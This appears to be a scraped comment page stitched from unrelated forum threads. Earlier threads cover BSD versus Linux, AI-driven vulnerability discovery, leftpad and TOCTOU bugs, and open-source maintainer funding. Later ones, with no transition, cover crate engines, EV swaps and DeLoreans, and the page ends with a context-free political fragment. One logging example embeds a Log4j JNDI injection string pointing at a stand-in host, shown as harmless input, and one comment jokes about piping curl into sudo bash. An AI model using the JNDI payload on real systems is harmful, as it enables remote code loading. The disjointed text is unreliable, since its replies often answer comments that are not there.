
It's ok, I don't read that fast.

Good to know. I had been teetering on picking this stuff up for a month or so. Now that I know it is yet another tech nerd thing with Us vs. Them zealotry (or Pepsi Taste Loyalty Test), I'm sold. If I profile as iPhone, PlayStation, ReplayTV over TiVo, Sega over NES, C64, videodisc over cassette (I blame my dad for that), which side should I choose? Does either one have better-quality zealots (I want to be on the other side)?

There’s always a guy. It’s great that your favorite distro is definitely safer. An order of magnitude fewer exploits will mean only a few thousand or so, I suppose. Ozymandias used Gentoo.

Calling FreeBSD "just a distro" is verging on insulting. It's an operating system.

Apologies, "OS". I am not a native speaker of whatever place considers these fightin' words.

Distros are operating systems.

Well, as they're a FreeBSD dev, I would be surprised if they pointed anyone in a different direction.

FreeBSD is not a distro. It's not even Linux; it's a completely different kernel and operating system that traces back to even before Linux. It's honestly closer to Darwin than it is to Linux; macOS is technically a BSD. (Not FreeBSD though.)

Darwin is its own thing really. There are parts from BSD, there are also parts from Mach and there are also unique parts.

Of course. Linux does not share any heritage with BSD though.

Except that they are both based on Unix and (generally) made to run on x86 processors, which is a pretty big similarity.

FreeBSD is not a distro

What does the D in BSD stand for again?

That's more of a historical artifact. The BSDs started as just "BSD": a set of patches for AT&T Unix that were _distributed_ by Berkeley. Eventually the patches became complete enough to be an entire operating system. _Then_ the various BSDs that we know today (FreeBSD, OpenBSD, NetBSD, DragonflyBSD) all forked and became completely independent operating systems. For decades, FreeBSD's kernel and userland have been developed independently from OpenBSD's kernel and userland, which in turn are developed independently from NetBSD's kernel and userland, etc. You could not take an OpenBSD program and run it on FreeBSD. Even recompiling from source isn't necessarily enough, since the BSDs support different syscalls.

They are completely independent operating systems with a distant shared history.

Whereas on Linux, the distros are taking a common Linux kernel source, and combining it with their choice of common userlands like GNU. Debian has the same kernel and GNU userland that Arch and Fedora use. You could take a program compiled for Debian and run it on Arch, which is common these days due to Docker where you're pulling another distro's userland and running it on your distro's kernel. That is how Linux distros are "distros" whereas the BSDs are independent operating systems.


Distribution. Which is a different word than distro, with a different meaning. Like smart and smartass.

While you’re correct that FreeBSD is not a Linux distribution, the word “distro” is literally short for distribution. It doesn’t have a different meaning like smart and smartass, it’s more like repo and repository.

Distribution. But it’s not a Linux distribution.

So, to play Pandora, what if the net effect of uncovering all these unknown attack vectors is that it actually empties the holsters of every national intelligence service around the world? Just an idea I have been playing with. Say it basically cleans up everything, and everyone looking for exploits has to start from scratch, except “scratch” is now a place where any useful piece of software has been fuzz-tested, property-tested, and formally verified.

Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.


TBH this is a pretty good way of looking at it. Yeah we're seeing an explosion of vulnerabilities being found right now, but that (hopefully) means those vulnerabilities are all being cleaned up and we're entering a more hardened era of software. Minus the software packages that are being intentionally put out as exploits, of course. Maybe some might say it's too optimistic and naive, but I think you have a good point.

I agree with the prediction but not the timing. We won't enter a more hardened era of software until after a long period of security vulnerabilities.

Rivers caught on fire for a hundred years before the EPA was formed.


New code will also use these tools from the get go, hopefully vastly reducing the vulnerabilities that make it to prod to begin with.

The future may be distributed quite unevenly here, as they say, with a divergence between a small amount of "responsible" code in systems which leverage AI defensively, and a larger amount of vibe-coded / prompt-engineered code in systems which don't go through the extra trouble, and in fact create additional risk by cutting corners on human review. I personally know a lot of people using AI to create software faster, but none of them have created special security harnesses a la Mozilla (https://arstechnica.com/information-technology/2026/05/mozil...).

> we're entering a more hardened era of software

This is one force at work. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.

I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OSS library; there's no reason to assume the average author would magically create fewer bugs than the original OSS library authors initially did. But the vulnerabilities will have much narrower scope: if you successfully exploit an OSS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of finding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".


If I hand-roll my logging library, I'm unlikely to include automatic LDAP requests based on message text (the infamous Log4j vulnerability).
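
Roughly what I mean, as a sketch only (the function name and log path are made up): a hand-rolled logger treats the message as an opaque string and never interprets it, so a Log4j-style lookup token stays inert.

    const fs = require('fs');

    // Minimal hand-rolled logger: stamp the line and append it, nothing more.
    // The message is never parsed, expanded, or used to trigger any lookup.
    function logLine(level, message) {
      const line = `${new Date().toISOString()} [${level}] ${message}\n`;
      fs.appendFileSync('app.log', line);
    }

    logLine('INFO', 'user input: ${jndi:ldap://evil.example/a}'); // just text, nothing happens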

I’m seeing a lot of similar things during code reviews of substantially LLM-produced codebases now. Half-baked bad ideas that probably leaked in from training sets.

It would be very helpful to see even just one example of this syndrome posted so others could become better informed.

That particular vulnerability, sure, but there's lots of ways to make mistakes.

While I agree, it also changes the mathematics of it: if a bad actor wants to hack me specifically, now they have to write custom code that targets my software after figuring out what it _is_. This swaps the asymmetry around: instead of one bad actor writing an exploit for all the world (and those exploits being even harder to find), you have to hate me specifically.

Admittedly, not hard to do, but it could save some other folks.


Depends on how cheap running LLMs against your software becomes in the future.

Typically when hand-rolling code you implement only what you require for your use case, while a library will be more general purpose. As a consequence of doing more, it has more code and more bugs.

Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.

For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.


leftpad was a focused custom implementation of a specific feature, instead of a library full of generalized functionality. At the time it was pulled, the leftpad code (JavaScript, Node, NPM) was:

    module.exports = leftpad;
    
    function leftpad (str, len, ch) {
      str = String(str);
    
      var i = -1;
    
      ch || (ch = ' ');
      len = len - str.length;
    
      while (++i < len) {
        str = ch + str;
      }
    
      return str;
    }
A newer version was https://github.com/left-pad/left-pad/blob/master/index.js, which cached common cases and improved on the loop performance, before String.prototype.padStart() became a thing: https://www.npmjs.com/package/string.prototype.padstart

Both old and new versions return a string longer than `len` if the padding char is multiple characters, e.g. leftpad('a', 3, '&&&&') will be longer than 3. That feels like it shouldn't happen.
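
One way to guard against that, as a sketch only (hypothetical name, not the real left-pad API): keep a single pad character and never exceed the target length.

    // Keep only the first character of the pad; never return more than `len`
    // characters (unless the input is already longer than `len`).
    function leftpadStrict(str, len, ch) {
      str = String(str);
      ch = String(ch == null || ch === '' ? ' ' : ch)[0];
      if (str.length >= len) return str;
      return ch.repeat(len - str.length) + str;
    }

    leftpadStrict('a', 3, '&&&&'); // '&&a' -- exactly 3 characters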


That's almost literally the first string exercise you'll do in "The C Programming Language, 2nd ed." It's one of the most trivial cases, alongside writing a word/space/tab counting program (wc under Unix).

I realize I may have made it seem like I was saying leftpad was a general-purpose library. My aside about it was to note that even widely used libraries can still have bugs. That’s orthogonal to their scope.

Yes, a lot hinges on how little you can get away with implementing for your use case. If you have an XML config file with 3 settings in it, you probably won't need to implement handling of external entities the way a full XML parsing library would, which will close off an entire class of attendant vulnerabilities.
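
As a sketch of what I mean (the three setting names here are made up), pulling exactly the known settings out of a small, trusted config file needs none of the machinery, so the whole external-entity class of bugs simply isn't there:

    const fs = require('fs');

    // Read three known settings from a small, trusted XML-ish config file.
    // No general XML parsing, so no DTDs, external entities, or expansion bugs.
    function readConfig(path) {
      const text = fs.readFileSync(path, 'utf8');
      const settings = {};
      for (const name of ['host', 'port', 'timeout']) {   // hypothetical keys
        const m = text.match(new RegExp(`<${name}>([^<]*)</${name}>`));
        if (m) settings[name] = m[1].trim();
      }
      return settings;
    }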

> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.

This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.

On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.


This argument goes even further. If you have only 3 settings, why does it need to be an XML file?

ETA: I'm not saying it has to, I'm saying it's possible to imagine reasons that would justify this decision in some cases.

Because it might grow in future and you want to allow flexibility for that; because it might be the input to or output from some external system that requires XML; because your team might have standardised on always using XML config files; because introducing yet another custom plain-text file format just creates unnecessary cognitive load for everyone who has to use it. Those are all real-world reasons I can think of.

But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.


I’m not aware of any memory corruption bugs, but there were some weird cases where Linux, stuck with legacy 8-bit character handling for filenames and paths, led to undesirable behavior with Rust’s native Unicode strings.

The race conditions were indeed TOCTOU bugs. In a sense, the bugs were a result of incorrectly handling shared mutable data, though in this case the mutations were external to Rust.

https://corrode.dev/blog/bugs-rust-wont-catch/
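
For anyone who hasn't seen the shape of a TOCTOU bug, here's a minimal sketch (in JavaScript rather than Rust, and not the actual uutils code): the state verified at "time of check" can change before "time of use".

    const fs = require('fs');

    // Time of check: lstat says the path is not a symlink.
    // Time of use: chmod follows symlinks, and another process may have swapped
    // the path for a symlink in between, so this can change the permissions of
    // a completely different file.
    function makeWorldReadable(path) {
      const st = fs.lstatSync(path);
      if (!st.isSymbolicLink()) {
        fs.chmodSync(path, 0o644);
      }
    }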


>there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did

Have you read this old code? It's terrible and written with no care at all for security, often in C. AI is much, much better at writing code.


Do you have a specific library in mind? I think it would have to be an ancient, unmaintained C library.

But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.


> even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel

There have been two LPE vulnerabilities and exploits in the Linux kernel announced today. After the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.

(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)


One. "Copy Fail 2" and "Dirty Frag" are the same thing.

And considering the size of the kernel, I call this stupendously good.

You (anyone, not you personally) write that much code yourself and let's see how well you do in comparison.


But that's the attacker's advantage. You can do things right a billion times and one mistake will still take you down.

Sure, I didn't mean to say that these examples are guaranteed 100% safe -- just that I trust them to be enormously safer than software that accomplishes the same task but was hand-written by either a human or an LLM last week.

To be fair, to some extent that’s up to us. Time to get cleaning, I guess.

Are you intentionally avoiding saying ‘thanks to LLMs’, or is it implicit? Since all these recent mega bugs surface with lots of fuzzing and agentic bashing, right?

Thank you for reminding us all that you AI bros are still the most obnoxious people there are.

Indeed, yet more proof that there's a part of the HN crowd which is passive-aggressive, dismissive, and dishonest in the most scientific sense possible. It won't make my day harder than it is, but it is a very weak signal.

If I'm to be offended by a single thing in your post, it is being called names - "AI bro". That was undeserved, and could not be farther from the truth. Not to mention the fact that your comment is entirely off topic; perhaps you see AI bros everywhere now.


This seems like a very emotional response, which is off-topic for HN. Consider using facts and logic to make calm, rational arguments.

Faults are injected into the code at a constant rate per developer. Then there are the intentional injections.

Auto-installing random software is the problem. It was a problem when our parents did it; why would it be a good idea for developers to do it?


This is related to a massive annoyance of mine: when I run a piece of software and the system is missing a required dependency, I want the software to *tell me* that dependency is missing so I can make a decision about proceeding or not. Instead it seems that far too often software authors will try and be “clever” by silently installing a bunch of dependencies, either in some directory path specific to the software, or even worse globally.

I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.
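
As a sketch of the behavior I want (the dependency name and the flag here are made up), failing loudly is all it takes:

    // Refuse to run rather than silently fetching the missing dependency.
    let imageLib;
    try {
      imageLib = require('sharp');   // hypothetical optional dependency
    } catch (err) {
      console.error('Missing dependency "sharp".');
      console.error('Install it yourself (npm install sharp) or rerun with --no-thumbnails.');
      process.exit(1);
    }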


Ruby gems and CPAN have build scripts that rebuild stuff on the user's device (and warn you if they can't find a dependency). But I believe it was one of Python's tools that started the trend of downloading binaries instead of building them. Or was it NPM?

Python's pip predates npm, installs dependencies automatically, and the old-style packages could run arbitrary code during the install.

RubyGems is older than that, but I have no idea what capabilities it has/had.


Is it really a constant rate? Or is it a Law of Large Numbers kind of thing, where past a certain scale the randomness gets smoothed out and looks constant? Or something else?

(Obviously some developers are better or worse than others, so I presume your observation is assuming developer skill as a constant.)


curl ... | sudo bash

yolo!


New software is being generated faster than it can be adequately tested. We are in the same place we've always been, except everything is moving much too fast.

This is exactly the feeling I have. First: excessive growth of dependencies fueled by free components.

* with internet access to FOSS via sourceforge and github we got an abundance of building blocks

* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use

Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments of a multitude of packages.

This may all end well ultimately, but we're definitely in for a bumpy ride.


I'm somehow reminded of Wile E. Coyote running off a ledge, staying aloft until he realizes there is no more ground under his feet.

Here's a crazy idea -- what if some of these vulnerabilities are surfacing because they have actually been found, already, and exist in the training data?

Even an intelligence agency doesn't have perfect opsec, and something could get mentioned offhand somewhere on a forum, but never get picked up until the LLM uses it.


I think it will be an arms race in the future as well. Easier to fix known vulnerabilities automatically, but also easier to find new ones, and the occasional AI fuckup instead of the occasional human fuckup.

Yeah.

Right now it kinda feels to me like "Open Source" is the Russian army, counting on their sheer numbers and their huge quantity of equipment, much of which is decades old.

Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that the Open Source community has never seen before, and for which it has very little defence capability.

The attackers with cheap drones or LLMs are completely overwhelming the old school, who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about it quickly enough.


Well this argument was certainly inventive. What a weird impression to have about these things.

Who exactly is the innocent little Ukraine supposed to be that the big bad open source is supposed to be attacking in order to, what, take their land and make the OSS leader look powerful and successful at achieving goals to distract from their fundamental awfulness? And who are the North Korean cannon fodder purchased by OSS while we're at it?

Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.


This assumes that there are no new exploits being generated.

We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?

The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.

We need to solve the underlying problem: how to sustainably develop and maintain the software we need.

A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.


That is already how it works. The loner hacker in mom's basement working for free on his super critical OSS package is largely a myth. The vast majority of OSS code is contributed by companies paying their employees to work on it.

I'm thinking of projects like curl [0].

This is a cornerstone of modern software development. If it died, or if it got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].

We need to do better than this.

[0] https://curl.se/docs/governance.html

[1] https://lwn.net/Articles/1034966/


> As an example, he put up a slide listing the 47 car brands that use curl in their products; he followed it with a slide listing the brands that contribute to curl. The second slide, needless to say, was empty.

> He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.

There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think that by now any hope that they would voluntarily be any less exploitative than they can be would have been dashed.

If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.


There is a lot of opposition in the FOSS community to restrictive/protective licenses. And to be fair, this comes from a consistent and entirely logical worldview.

There are a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.

I don't have any answers or solutions. But I don't think we can hand-wave the problem away.


The problem is that they get away too easily with bugs in the products they ship to customers. If this came with some penalties, there would be some incentive to invest in security, and this would probably often flow back to upstream projects.

Seriously? You think that curl gets away with bugs shipping to prod? And that's the major problem?

I don't agree with any of that.


I was not talking about curl, but about the downstream products such as cars. And I am sure curl would appreciate support from car vendors; that was the point, wasn't it?

Like a money-back guarantee?

Like you get when you buy e.g. MS products?

/s


I am not talking about the open-source projects, but the downstream products such as cars that integrate curl.

The sad truth about open source in 2026 is that it does not serve society the way it is advertised, or the way it did back in the 90s.

How so? We have open source operating systems running on a whole slew of systems ages apart. Interesting ideas and open collaboration coming out of the OSS world.

This is opposed to closed-off “products” that change at the whims of the company owning them.


Statistically. Most of it is created to serve marketing, personal, or other agendas, and is sponsored through the corresponding means.

There’s a lot of misconception about how open source comes to be, and only a very small part of it, still significant of course, was really created for the benefit of a community. There are exceptions, but dig into the organisational culture and origins and you’ll see the pattern. Also, thousands of projects are made for the satisfaction of the author himself, being highly intelligent and high on algorithmic dopamine.


There is an xkcd about that, I think.

obviously ;)

Having casually read into a few recent incidents, it seems the vector has often been outside of the software: a lot of misconfigurations, or simply attacking the human in the chain. And nation states have basically unbounded resources for everything from bribes and insiders to standing up entire companies.

We'll need those animal bones if all the industrial control systems get turned against us.

Nuclear might be air-gapped, but what about water, power…?


What we are seeing so far come out of the AI agent era is reduced, not increased, code quality. The few advances are far outweighed by all the slop that's thrown around, and that's unlikely to change.

> any useful piece of software has been fuzz tested, property tested and formally verified.

That would require effort. Human effort and extra token cost. Not going to happen; people would rather move fast and break things.


Isn't blaming AI for that similar to blaming C for buffer overflows?

More people are producing more code because of easier tools. Most code is bad. But that's not the tools' fault.

And in the end it is a problem of processes and culture.


We are not in disagreement here. I'm not blaming AI, I'm blaming the culture around its use.

>What we are seeing so far come out of the AI agent era is reduced not increased code quality.

I am not disagreeing in the main, but I wonder about the net effect. Again, this is total speculation on my part. If I vibe-slop a half dozen apps this week (and I might, just you watch), the overall raw code quality in the universe gets worse. But if, in the same span of time, two major security holes got patched (assume no net change in the amount of code), didn't things actually get better?


I didn’t have any context, so I went shopping and it looks like you’re right https://www.gmperformancemotor.com/category/ENG.html

Which is a bit wild to me because I looked into adding a supercharger to my 2010 Camaro last month and it was 7-9k DIY.


First thought was this should make for some fun resto-mods.

If I had infinite time and money, I would do this to a DeLorean.

Where is your sense of adventure? If you do it to a DeLorean, you might wind up with infinite time. Plus, pretty much every local car show I've been to has a handful of DeLoreans that I'd assume the owners are probably over maintaining. Actually, scratch that, let's go into a 3D printing business for DeLorean replacement parts to get the money thing down.

Many DeLorean parts - famously excluding the left fender - are still available as NOS from the company that bought John DeLorean's factory.

In fact, there are still complete, serviceable engines _and chassis_ available. And the chassis are already registered with a VIN, so when built they can be sold as new 1984 model year vehicles.


Just to be clear, you really stomped on my Back to the Future joke, weak as it was.

Great Scott! This is heavy. If we go back 60 minutes, maybe your joke still lands.

Curious what's the issue with the left fender

Probably a frequently damaged part; it's the part that will be hit first if you pull out into the path of another car.

If I remember correctly, it was the next part to be manufactured en masse before the factory shut down. They'd do a few days of X part, another few days of Y part, etc., in rotation. Another part of the factory was assembling the complete vehicles from the parts in stock.

There's a video series on YouTube about a guy who did just that. He bought a Chevy Bolt and swapped everything over:

https://www.youtube.com/watch?v=aVaQtd0LQRI


Electric motors don’t have torque curves. It’s all available right away. As a kid I remember reading in Wired about an electric car scene in California where they had to learn things the hard way and one guy’s maiden voyage ended still in his driveway with the backend split in two.

This is essentially the "area under the curve" argument. But it's been polluted to the point of absurdity by Internet fanboys with an agenda, so now everyone thinks EVs are some magical thing that doesn't abide by the laws of physics.

No amount of fanboy screeching is going to change the fact that it's only 200hp. Compared to a bone-stock 70s/80s car that made 200-250hp from the factory, this 200hp EV will be a riot. But at $20k that's not what it's being compared against. The 500+HP LS crate motor and transmission combo (i.e. what this is being cross-shopped against) is going to make more than that from ~2500rpm on up.

If you graph power available at a given output RPM with an electric motor, you get a line. With an ICE you get an upward and then tapering-off curve. When you add transmission gears to the ICE, it's a series of essentially overlapping saw teeth, except in first gear, where it goes all the way down to whatever power you make at 1500-2000rpm (so a little under 100hp for a ~500hp engine, probably more like 30hp for an ICE that makes ~200hp stock).

Basically even with a flat curve there comes a point where the taller curve is so much taller it still wins.

When comparing to cars of about the same horsepower, the EV is gonna win every time, because of the flat curve. Even comparing to a more powerful ICE car where the areas are approximately equal, you don't have to pull back to shift (even CVTs "shift"; it's for longevity reasons), and the ICE is probably not geared deep enough for best initial acceleration (though at "modern" power levels both cars have more than enough to roast the tires), so the EV is still probably better.
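
To make the saw-teeth picture concrete, here's a toy calculation (every number is made up; it's a sketch, not a model of any real car): at each road speed, compare the flat 200hp EV line against the best power a peaky 500hp ICE can deliver in whichever gear keeps it under redline.

    // Toy numbers only: a flat 200 hp EV vs a hypothetical peaky 500 hp ICE through four gears.
    const evPowerHp = 200;
    const gearRatios = [3.06, 1.63, 1.0, 0.7];           // illustrative 4-speed ratios
    const finalDrive = 3.42, tireRevsPerMile = 750, redlineRpm = 6500;

    // Crude made-up ICE power curve: ramps up and peaks near redline.
    const icePowerHp = rpm => 500 * Math.max(0, Math.sin(Math.PI * rpm / (2 * redlineRpm)));

    for (let mph = 10; mph <= 120; mph += 10) {
      const wheelRpm = mph * tireRevsPerMile / 60;
      let bestIce = 0;
      for (const g of gearRatios) {
        const engineRpm = wheelRpm * g * finalDrive;
        if (engineRpm <= redlineRpm) bestIce = Math.max(bestIce, icePowerHp(engineRpm));
      }
      console.log(`${mph} mph: EV ${evPowerHp} hp, ICE (best gear) ${Math.round(bestIce)} hp`);
    }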

And as an aside, I think it's dumb that they make you replace the transmission. There are tons and tons and tons of cars out there that either still have the original transmission or someone swapped an SBC into them in 19-whatever. Being able to just replace the engine would make the swap a ton more accessible because you don't have to also add transmission mounting, controls, driveshaft, etc. to the list. Most older transmissions can handle "muh EV torque" just fine. It's the shifting under torque they don't like.

Basically this is cool but I think it's too expensive for the specs it has.

Edit: Not calling you a stupid fanboy, just saying you've been misled by them.


There will be torque multiplication by the transmission in 1st through 2nd, so it won't be as much of a dog as you think. Race car, no. But it'll hold its own in modern traffic, unlike a lot of older cars.

Out of curiosity I looked up the ratios for the mentioned 4L60 transmission: 1st is 3.059:1, 2nd is 1.625:1, 3rd is direct drive at 1.00:1 and 4th is overdrive at 0.696:1. Then you'll have the ratio in your rear differential, whatever that happens to be.

My high school car was a 1975 Impala with the 350 cubic inch small block V8. Because of the Malaise Era emissions laws, it only produced 145hp but still had decent torque at 250ft·lb. It had a huge amount of space under the hood so perhaps this could fit both the motor and battery in there? (F/R weight balance being ignored)

Your point about people comparing this against the LS crate motor is correct IMO. This will be an expensive low-volume kit until (if!) economies of scale kick in. Only bought by people who want something different to show off to their friends at the weekend car shows.


> hold it's own in modern traffic

A 90HP Volkswagen will do that. Nobody needs 200HP to keep up with traffic.


The people who drive performance cars do. I never had a problem in my old Geo Metro making 50hp - except when following a Corvette - they always waited until the end to accelerate and I needed the whole ramp to get up to speed. It works for them because they had enough power for that trick.

People get worse at merging when they have more power on tap. Saw it in my own household.

50hp per ~1000lb is just about the minimum if you want to hold highway speed on inclines.

Being comparable to the original performance might be a feature on its own.

Insurance companies don't care what mods you do to your car, even EV swapping, except performance mods. If you tell them you've been doing performance mods, they'll drop you.


In Europe maybe. In the US they just don't cover those parts or value.

> Edit: Not calling you a stupid fanboy, just saying you've been mislead by them.

No worries at all, and I should have been clearer that I wasn't saying it was just as good, more that it wasn't "Oh well, 200hp" like an ICE engine. I also think raw horsepower is overrated in street driving. As a single data point, a couple of weeks ago I got to run three laps in a GTR "Godzilla" at Loudon on the interior track. It was a blast, but after I'd come down off the high I realized that 585hp did not feel wildly different from the ~400hp in my Camaro. And I rarely get to use much of that (other than some of those lovely overly long onramps around here).


As somebody who used to race FB RX-7s and NA Miatas, I can say with complete certainty that somewhere north of 120rwhp would have been nice. 200 in either car would have been a hoot, especially with the EV flat power curve. And in neither would I have wanted more than ~300hp, because I have no need to go more than 150mph surrounded by other amateur car nerds. I gave up instructing because cars are just too darn fast - when I started, Miatas and Rabbits and Civics were the norm, then came the E36 and E46 M3s, and then boost buggies, and then the C6, and NOPE NOPE NOPE I have a wife and a mortgage and don't need this anymore.

Ha, my next-door neighbor spent COVID rebuilding his CTS-V engine and the next time he went to a track day they told him he had to wear a flame-retardant suit from now on because he broke 10 seconds over whatever the standard time/distance is.

Doesn't the GT-R usually weigh significantly more than a Camaro?

No. I double-checked because I was going to be stunned if something could be heavier without having gravitational pull and they're pretty close.

- GT-R (R35, 2009–2025) generally ranges between 3,700 lbs and 3,950 lbs (approx. 1,680–1,790 kg)

- 2010 Chevrolet Camaro curb weight ranges from approximately 3,719 to 3,913 pounds (1,687–1,775 kg)

I will say that must make Godzilla denser.


Oh he has those too. According to the article, his are comically oversized, even for the genre. Because of course they are. The poor dude just screams I WANT TO BELONG in a way the other children find repellent. Other than bullies who know the value of a useful fool. Weird.

A. It shows you what deep thinkers the whole place is made of, regardless of the person in charge right now (who is incredibly odious).

B. Of course _you_ would say that.


Did you arrive late? Could be you actually survived a purge.
